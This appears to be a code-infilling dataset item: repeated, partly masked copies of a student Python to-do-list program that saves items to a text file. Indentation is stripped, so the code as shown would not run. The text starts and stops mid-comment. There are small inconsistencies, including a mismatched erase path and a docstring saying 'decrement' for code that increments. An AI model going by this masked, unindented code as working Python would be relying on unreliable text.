the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
<mask token>
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
<mask token>
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
<mask token>
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
<mask token>
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
<mask token>
| <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
<mask token>
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
<mask token>
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location, 'w')
data_file_w.write(
"""Warning: The Todo-List Program will not be able to load this save file if it is incorrectly modified. Modify at your own risk. The structure is Entry Text, Entry Priority as a number, Entry Group as a number (Not Yet Utilized, but necessary), and Entry Visibility as a boolean, each on a separate line, a single line gap in between, and the very first line is skipped
"""
)
for item in todo_list:
data_file_w.write('{0}\n{1}\n{2}\n{3}\n\n'.format(item.text, str(
item.priority), str(item.group), str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
<mask token>
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to remove
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to edit
Enter a negative number or zero to cancel"""
)
if item >= 0:
while True:
value = clean_input(
"""Which value would you like to edit? Enter:
1 for the Item Text (Currently: {0})
2 for the Item Priority (Currently: {1})
3 to Cancel and Exit"""
.format(todo_list[item].text, str(todo_list[item].priority)))
if value == 1:
print('The Current Text is: {0}'.format(todo_list[item].text))
todo_list[item].text = input('New Text:\n')
elif value == 2:
print('The Current Priority is: {0}'.format(str(todo_list[
item].priority)))
todo_list[item].priority = check_priority_overlap(int(
clean_input('New Priority:')), todo_list)
elif value == 3:
break
else:
print('Invalid Input - Please Try Again')
return
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
<mask token>
| <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
def concept_demonstration():
"""The purpose of this function is to prompt the user for numbers and
strings and manipulate them to demonstrate programming fluency with
string and integer operations.
:returns nothing"""
number = clean_input('Please enter a positive number')
number2 = clean_input('Please enter a number')
while number2 == 0:
print('Error: Cannot Divide by 0')
number2 = clean_input('Please enter a different number')
color = input('Please enter a color\n')
thing = input('Please enter a thing\n')
thing2 = thing + ' '
location = input('Please enter a location\n')
print(str(number) + ' raised to the power of ' + str(number2) + ' is ' +
str(number ** number2))
print('{0} multiplied by {1} is {2}'.format(str(number), str(number2),
str(number * number2)))
print('{0} divided by {1} is {2}'.format(str(number), str(number2), str
(number / number2)))
print('The remainder from dividing {0} by {1} is {2}'.format(str(
number), str(number2), str(number % number2)))
print('{0} divided by {1} rounded down is {2}'.format(str(number), str(
number2), str(number // number2)))
print('{0} plus {1} is {2}'.format(str(number), str(number2), str(
number + number2)))
print('{0} minus {1} is {2}'.format(str(number), str(number2), str(
number - number2)))
if number > 1:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing2 * int(number - 1) + thing))
elif number < 0:
print(
"""The {0} at {1} yelled '{2}'
You entered a negative number when a positive number was requested, so you made the {3} mute. Good Job."""
.format(color + ' ' + thing, location, thing2 * int(number), thing)
)
else:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing * int(number)))
return
<mask token>
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
<mask token>
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location, 'w')
data_file_w.write(
"""Warning: The Todo-List Program will not be able to load this save file if it is incorrectly modified. Modify at your own risk. The structure is Entry Text, Entry Priority as a number, Entry Group as a number (Not Yet Utilized, but necessary), and Entry Visibility as a boolean, each on a separate line, a single line gap in between, and the very first line is skipped
"""
)
for item in todo_list:
data_file_w.write('{0}\n{1}\n{2}\n{3}\n\n'.format(item.text, str(
item.priority), str(item.group), str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
<mask token>
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to remove
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to edit
Enter a negative number or zero to cancel"""
)
if item >= 0:
while True:
value = clean_input(
"""Which value would you like to edit? Enter:
1 for the Item Text (Currently: {0})
2 for the Item Priority (Currently: {1})
3 to Cancel and Exit"""
.format(todo_list[item].text, str(todo_list[item].priority)))
if value == 1:
print('The Current Text is: {0}'.format(todo_list[item].text))
todo_list[item].text = input('New Text:\n')
elif value == 2:
print('The Current Priority is: {0}'.format(str(todo_list[
item].priority)))
todo_list[item].priority = check_priority_overlap(int(
clean_input('New Priority:')), todo_list)
elif value == 3:
break
else:
print('Invalid Input - Please Try Again')
return
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
<mask token>
| <mask token>
class ListItem:
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible):
self.text = text
self.priority = priority
self.group = group
self.visible = visible
def concept_demonstration():
"""The purpose of this function is to prompt the user for numbers and
strings and manipulate them to demonstrate programming fluency with
string and integer operations.
:returns nothing"""
number = clean_input('Please enter a positive number')
number2 = clean_input('Please enter a number')
while number2 == 0:
print('Error: Cannot Divide by 0')
number2 = clean_input('Please enter a different number')
color = input('Please enter a color\n')
thing = input('Please enter a thing\n')
thing2 = thing + ' '
location = input('Please enter a location\n')
print(str(number) + ' raised to the power of ' + str(number2) + ' is ' +
str(number ** number2))
print('{0} multiplied by {1} is {2}'.format(str(number), str(number2),
str(number * number2)))
print('{0} divided by {1} is {2}'.format(str(number), str(number2), str
(number / number2)))
print('The remainder from dividing {0} by {1} is {2}'.format(str(
number), str(number2), str(number % number2)))
print('{0} divided by {1} rounded down is {2}'.format(str(number), str(
number2), str(number // number2)))
print('{0} plus {1} is {2}'.format(str(number), str(number2), str(
number + number2)))
print('{0} minus {1} is {2}'.format(str(number), str(number2), str(
number - number2)))
if number > 1:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing2 * int(number - 1) + thing))
elif number < 0:
print(
"""The {0} at {1} yelled '{2}'
You entered a negative number when a positive number was requested, so you made the {3} mute. Good Job."""
.format(color + ' ' + thing, location, thing2 * int(number), thing)
)
else:
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing * int(number)))
return
def cascade_list(priority_to_cascade_from, todo_list):
"""The purpose of this function is to decrement the priority number of
every item in the provided todo list greater than the priority number
provided.
:param priority_to_cascade_from: the number that is inserted by moving
everything equal to or greater than up by one
:param todo_list: the list of ListItem objects to check in"""
for item in todo_list:
if item.priority >= priority_to_cascade_from:
item.priority += 1
return
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input(
"""The priority number you entered overlaps with another entry's priority. Enter:
1 to change priority number
2 to leave as is with overlap
3 to push all priority numbers below this entry down by 1"""
)
if answer > 3 or answer < 1:
print('Invalid Option Selected\nPlease Try Again')
if answer == 1:
priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
def sorting(list_object):
"""The purpose of this function is to take in a ListItem custom object
and return the priority value stored in it to be used in sorting.
:param list_object: one ListItem object
:returns the priority value stored in the ListItem object"""
return list_object.priority
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
def load_from_file(save_location):
"""The purpose of this function is to open the .txt save file and read
the contents into memory in the form of a list of custom ListItem
objects.
:param save_location: the location the save file is stored in
:returns a list of ListItem objects that is populated with the data from
the save file"""
data_file_r = open(save_location, 'r')
list_item = ['Text', -1, 2, True]
todo = []
temp = 1
line_counter = 1
try:
for item in data_file_r:
if (line_counter - 1) % 5 != 0 and line_counter > 0:
cleaned_item = ''
for character_index in range(len(item)):
if character_index != len(item) - 1:
cleaned_item += item[character_index]
if temp == 1:
list_item[0] = cleaned_item
temp = 2
elif temp == 2:
list_item[1] = int(cleaned_item)
temp = 3
elif temp == 3:
list_item[2] = int(cleaned_item)
temp = 4
elif temp == 4:
if cleaned_item == 'False':
list_item[3] = False
else:
list_item[3] = True
todo.insert(0, ListItem(list_item[0], list_item[1],
list_item[2], list_item[3]))
temp = 1
else:
temp = 1
line_counter += 1
except ValueError:
print('An error has occurred trying to load the file')
result = int(clean_input(
'Please enter a 2 to overwrite the current save file and start over or any other number to exit the program'
))
if result == 2:
key = random.randint(2, 9)
if key == 2:
key = 1
result2 = int(clean_input(
"""Are you sure you want to delete all of your saved data
Enter {0} to proceed, or anything else to cancel"""
.format(str(key))))
if result2 == key:
data_file_w = open('C:Item_List.txt', 'w')
data_file_w.close()
todo = []
print('Save Data Erased')
return todo
else:
print('Program Exiting')
quit(1)
else:
print('Program Exiting')
quit(1)
data_file_r.close()
return todo
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location, 'w')
data_file_w.write(
"""Warning: The Todo-List Program will not be able to load this save file if it is incorrectly modified. Modify at your own risk. The structure is Entry Text, Entry Priority as a number, Entry Group as a number (Not Yet Utilized, but necessary), and Entry Visibility as a boolean, each on a separate line, a single line gap in between, and the very first line is skipped
"""
)
for item in todo_list:
data_file_w.write('{0}\n{1}\n{2}\n{3}\n\n'.format(item.text, str(
item.priority), str(item.group), str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
def select_item(todo_list, prompt='Error'):
"""The purpose of this function is to display a list of all items in the
todo list and number each individually to allow the user to select an
item to modify or delete. The available numbers may
skip some if some items are hidden
:param todo_list: the list of ListItem objects to display
:param prompt: the prompt to display to the user, default is Error
:returns the user selected item's index in a computer friendly form (
starting at 0 instead of 1)"""
valid = False
index = 0
while not valid:
counter = 1
for item in todo_list:
if item.visible:
print(counter, item.text, sep='\t')
else:
print(counter, '~ {0} ~'.format(item.text), sep='\t')
counter += 1
index = int(clean_input(prompt))
if index < counter:
valid = True
else:
print('Invalid Input: Number is too big')
return index - 1
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to remove
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to edit
Enter a negative number or zero to cancel"""
)
if item >= 0:
while True:
value = clean_input(
"""Which value would you like to edit? Enter:
1 for the Item Text (Currently: {0})
2 for the Item Priority (Currently: {1})
3 to Cancel and Exit"""
.format(todo_list[item].text, str(todo_list[item].priority)))
if value == 1:
print('The Current Text is: {0}'.format(todo_list[item].text))
todo_list[item].text = input('New Text:\n')
elif value == 2:
print('The Current Priority is: {0}'.format(str(todo_list[
item].priority)))
todo_list[item].priority = check_priority_overlap(int(
clean_input('New Priority:')), todo_list)
elif value == 3:
break
else:
print('Invalid Input - Please Try Again')
return
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
def menu_loop(todo_list, save_file_location):
"""The purpose of this function is to repeatedly display the todo list
and user prompts menu until the program is closed
:param todo_list: the list of ListItem objects to display or modify
:param save_file_location: where the .txt save file is located for saving
:returns nothing"""
show_hidden = False
selection = 0
invalid_input = False
while selection != 6:
if invalid_input:
invalid_input = False
else:
print_list(save_file_location, todo_list, True, show_hidden)
divider(137 + 17)
list_status = check_list_status(todo_list)
if list_status == 0:
selection = int(clean_input(
"""Please enter: 1 for Add Item, 2 for Remove Item, 3 for Edit Item, 4 for Mark Item Complete, 5 for Toggle Hidden, and 6 for Exit, 7 for Concept Demonstration
"""
))
elif list_status == 1:
selection = int(clean_input(
"""Please enter: 1 for Add Item, and 6 for Exit, 7 for Concept Demonstration
"""
))
else:
selection = int(clean_input(
"""Please enter: 1 for Add Item, 5 for Toggle Hidden, and 6 for Exit, 7 for Concept Demonstration
"""
))
print('')
if selection == 1:
add_item(todo_list)
elif selection == 2:
if list_status == 0:
remove_item(todo_list)
elif list_status == 2:
print(
'Invalid Command: The Todo List has no visible items to remove'
)
else:
print('Invalid Command: The Todo List has no items to remove')
elif selection == 3:
if list_status == 0:
edit_item(todo_list)
elif list_status == 2:
print(
'Invalid Command: The Todo List has no visible items to edit'
)
else:
print('Invalid Command: The Todo List has no items to edit')
elif selection == 4:
if list_status == 0:
mark_complete(todo_list)
elif list_status == 2:
print(
'Invalid Command: The Todo List has no visible items to mark complete'
)
else:
print(
'Invalid Command: The Todo List has no items to mark complete'
)
elif selection == 5:
if list_status == 0 or list_status == 2:
if show_hidden:
print('No longer showing hidden items')
show_hidden = False
else:
print('Now showing hidden items')
show_hidden = True
else:
print(
'Invalid Command: The Todo List has no items to show or hide'
)
elif selection == 6:
print('Now Closing')
elif selection == 7:
concept_demonstration()
else:
invalid_input = True
print('Invalid Input\nPlease Try Again')
def main():
"""The purpose of this function is to ensure the save file exists at the
specified save file location, load the save file into memory, display a
welcome message with a divider, then start the menu loop until the
program is closed
:returns nothing"""
save_file_location = 'Item_List.txt'
data_file_a = open(save_file_location, 'a')
data_file_a.close()
loaded_list = load_from_file(save_file_location)
print('Welcome to the To-Do List - Version: 0.1.2')
divider(42)
menu_loop(loaded_list, save_file_location)
<mask token>
| """This program displays a customizable list of items by priority value,
with priority 1 being the highest. Allows the user to add, edit,
mark complete, show completed (hidden), and remove items. Stores the list of
items in a .txt file located where this program's main.py file is. All
changes are automatically saved to the .txt file. Also includes a fun
technical knowledge demonstration using numbers and text responses. The
program will create a new save file if none exists, and prompts for save
file overwrite if data cannot be read successfully. Menu navigation is
accomplished through numeric inputs due to the text-only interface and
tedium of typing out each word accurately and repeatedly."""
__author__ = 'Jordan Kooyman'
# 1/26/21 - 4/15/2021 To-Do List Program - Integration Project for COP 1500
# Spring 2021
# Configurable settings saved to a separate file (?)
# Ability to load a different data or config file (?)
# Color code items by group (?)
# Add a basic calculator to meet math (and string?) command requirements (?)
# TODO: Implement a group system that shows all groups combined, just one
# group, or all categorized by group, and group names - be able to change
# group names (new function) - all functions support groups (individual or
# combined)
import random
# Random number generation used as random verification number when
# overwriting the save file in the event of a failure to load from the save
# file
class ListItem: # Create a class object that will store the data for each
# entry in the list (custom variable)
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible): # From w3schools.com
self.text = text
self.priority = priority
self.group = group
self.visible = visible
def concept_demonstration():
"""The purpose of this function is to prompt the user for numbers and
strings and manipulate them to demonstrate programming fluency with
string and integer operations.
:returns nothing"""
number = clean_input("Please enter a positive number")
number2 = clean_input("Please enter a number")
while number2 == 0: # Rejects a 0 if it is input as the second number
print("Error: Cannot Divide by 0")
number2 = clean_input("Please enter a different number")
color = input("Please enter a color\n")
thing = input("Please enter a thing\n")
thing2 = thing + ' ' # Adding space so that when thing is repeated, it
# has a space in between
# Raise the first number to the second number
location = input("Please enter a location\n")
print(str(number) + " raised to the power of " + str(number2) + " is " +
str(number ** number2))
# Multiply the two numbers
print("{0} multiplied by {1} is {2}".format(str(number), str(number2),
str(number * number2)))
# Divide the first number by the second number
print("{0} divided by {1} is {2}".format(str(number), str(number2),
str(number / number2)))
# Find the modulus of the two numbers
print("The remainder from dividing {0} by {1} is {2}".format(str(number),
str(number2),
str(number %
number2))
)
# Divide the first number by the second and round it down (floor it)
print("{0} divided by {1} rounded down is {2}".format(str(number),
str(number2),
str(number // number2
)))
# Add the two numbers
print("{0} plus {1} is {2}".format(str(number), str(number2),
str(number + number2)))
# Subtract the second number from the first number
print("{0} minus {1} is {2}".format(str(number), str(number2),
str(number - number2)))
if number > 1: # if the first number entered is greater than 1
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing2 *
int(number - 1) + thing))
# Combine two strings with + (no added space), repeat a string x
# number of times with * (must use an integer) (I have the minus 1
# and + thing to get the spacing to look proper and still repeat
# number amount of times) -if a negative number is used when
# multiplying a string, it does nothing (but does not crash) - but
# it is still handled in the other statement with some added user
# shaming
elif number < 0: # if the first number entered is negative
print("The {0} at {1} yelled '{2}'\nYou entered a negative number "
"when a positive number was requested, so you made the {3} "
"mute. Good Job.".format(color + ' ' + thing, location, thing2 *
int(number), thing))
# Same as above, expect that it will print nothing in the yelled
# section if the first number entered is negative
else: # if the first number entered is 0 or 1 (because of the int()
# function removing a decimal)
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing *
int(number)))
# this is to prevent errant spaces or showing the phrase too many times
return
def cascade_list(priority_to_cascade_from, todo_list):
"""The purpose of this function is to decrement the priority number of
every item in the provided todo list greater than the priority number
provided.
:param priority_to_cascade_from: the number that is inserted by moving
everything equal to or greater than up by one
:param todo_list: the list of ListItem objects to check in"""
for item in todo_list:
if item.priority >= priority_to_cascade_from:
item.priority += 1
return
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input("The priority number you entered overlaps "
"with another entry's priority. Enter:\n1 to "
"change priority number\n2 to leave as is "
"with overlap\n3 to push all priority numbers"
" below this entry down by 1")
if answer > 3 or answer < 1:
print("Invalid Option Selected\nPlease Try Again")
if answer == 1:
priority_to_check = check_priority_overlap(
int(clean_input("New Priority:")), todo_list)
# change the priority value input
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
def sorting(list_object): # Takes in a ListItem object and returns the
# priority value - from w3schools.com
"""The purpose of this function is to take in a ListItem custom object
and return the priority value stored in it to be used in sorting.
:param list_object: one ListItem object
:returns the priority value stored in the ListItem object"""
return list_object.priority
def print_list(save_file_location, my_list, to_save=False, show_hidden=False):
# Prints out the To-Do list from the common list variable and saves list
# to the .txt file
"""The purpose of this function is to take in the location of the save
file, the todo list variable, whether or not to save, and whether or not
to show hidden and print out the todo list variable, skipping items
marked as hidden unless it is told to show hidden, and saving the todo
list to the file in the save file location if it is told to save.
:param save_file_location: the file path to get to the .txt save file
:param my_list: the list of ListItem objects to check in
:param to_save: whether or not to save the list of items to the file,
default
is false
:param show_hidden: whether or not to display the hidden list items,
default
it false
:returns nothing"""
my_list.sort(key=sorting) # Uses a custom function to be able to get the
# right value to sort by
print("To-Do:")
for item_index in my_list: # The range needs to be the length of the list
# being printed
if item_index.visible and not show_hidden: # Only print visible items
# if show hidden is false
print(item_index.priority, item_index.text, sep='.\t')
elif show_hidden: # Print everything is show hidden is trues
if item_index.visible:
print(item_index.priority, item_index.text, sep='.\t')
else:
print("{0}.~\t{1}".format(item_index.priority, item_index.text)
)
# Indicate hidden items
# Printing the item priority with a dot, then the item, with a tab
# separating them
if to_save:
save_list(my_list, save_file_location)
return
def divider(size=100): # Draws a dividing line to go between sections
# (default 100 characters long)
"""The purpose of this function is to print a dashed line across the
screen with a specified length.
:param size: how many characters long the line should be, default is 100
:returns nothing"""
for i in range(size):
print('-', end='') # Prints out a single dash, no newline afterwards
# (the end= sets the last character to blank
print('') # Print out a newline (using the default ending of a print
# statement being a newline
return
def clean_input(prompt='Error'): # A special input function that will reject a
# user's input of text when a number is requested -- if no prompt is
# specified in the program, it will display "Error"
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try: # Adapted from an example in the ThinkPython textbook (15.7) -
# Checks whether the input is a number, positive or negative. If
# not, rejects the input and user gets to try again
float(phrase)
text = False
except ValueError:
print("Error: Non-Numeric Entry Detected")
# if phrase.isnumeric(): # Checks for a positive number (negative
